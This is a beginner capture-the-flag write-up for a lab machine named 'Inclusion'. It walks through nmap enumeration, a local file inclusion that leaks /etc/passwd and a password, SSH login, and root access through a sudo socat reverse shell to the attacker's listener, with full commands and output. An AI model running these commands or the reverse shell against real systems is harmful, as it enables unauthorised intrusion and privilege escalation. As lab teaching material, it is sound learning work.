Inclusion | CTF write-up

today's CTF is really easy, and really recommend it for beginners to CTFs, let's go straight to it

ENUMERATION!

root@kali:~# nmap -sC -sV 10.10.94.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-10 14:38 UTC
Nmap scan report for ip-10-10-94-6.eu-west-1.compute.internal (10.10.94.6)
Host is up (0.0014s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
|   256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_  256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-title: My blog
MAC Address: 02:13:CE:65:8B:84 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.02 seconds
root@kali:~#

We have two ports open 22 for SSH and 80 for HTTP running under python, which I think running django ... anyways!

ow look at that LFI-attack!
ok

and we have the /etc/passwd and a clear password for our user down there ...

root@kali:~# ssh falconfeast@10.10.94.6
The authenticity of host '10.10.94.6 (10.10.94.6)' can't be established.
ECDSA key fingerprint is SHA256:VRi7CZbTMsqjwnWmH2UVPWrLVIZzG4BQ9J6X+tVsuEQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.94.6' (ECDSA) to the list of known hosts.
falconfeast@10.10.94.6's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Apr 10 20:13:54 IST 2020

  System load:  0.42              Processes:           87
  Usage of /:   34.9% of 9.78GB   Users logged in:     0
  Memory usage: 32%               IP address for eth0: 10.10.94.6
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

3 packages can be updated.
3 updates are security updates.


Last login: Thu Jan 23 18:41:39 2020 from 192.168.1.107
falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat
falconfeast@inclusion:~$

we are user falconfeast ! and we have a NOPASSWD SUDO FOR SOCAT .... speaking of socat, there's a PoC in GTFObins, I really recommend checking the website it does have a lot of good knowledge.

root@kali:~# socat file:`tty`,raw,echo=0 tcp-listen:5151
falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat
falconfeast@inclusion:~$ RHOST=10.10.95.247
falconfeast@inclusion:~$ RPORT=5151
falconfeast@inclusion:~$ sudo /usr/bin/socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane

root@kali:~# socat file:`tty`,raw,echo=0 tcp-listen:5151
sh: 0: can't access tty; job control turned off                                     
# id                                                                                
uid=0(root) gid=0(root) groups=0(root)
# 

and that's it here, go get your flags!

Happy Hacking!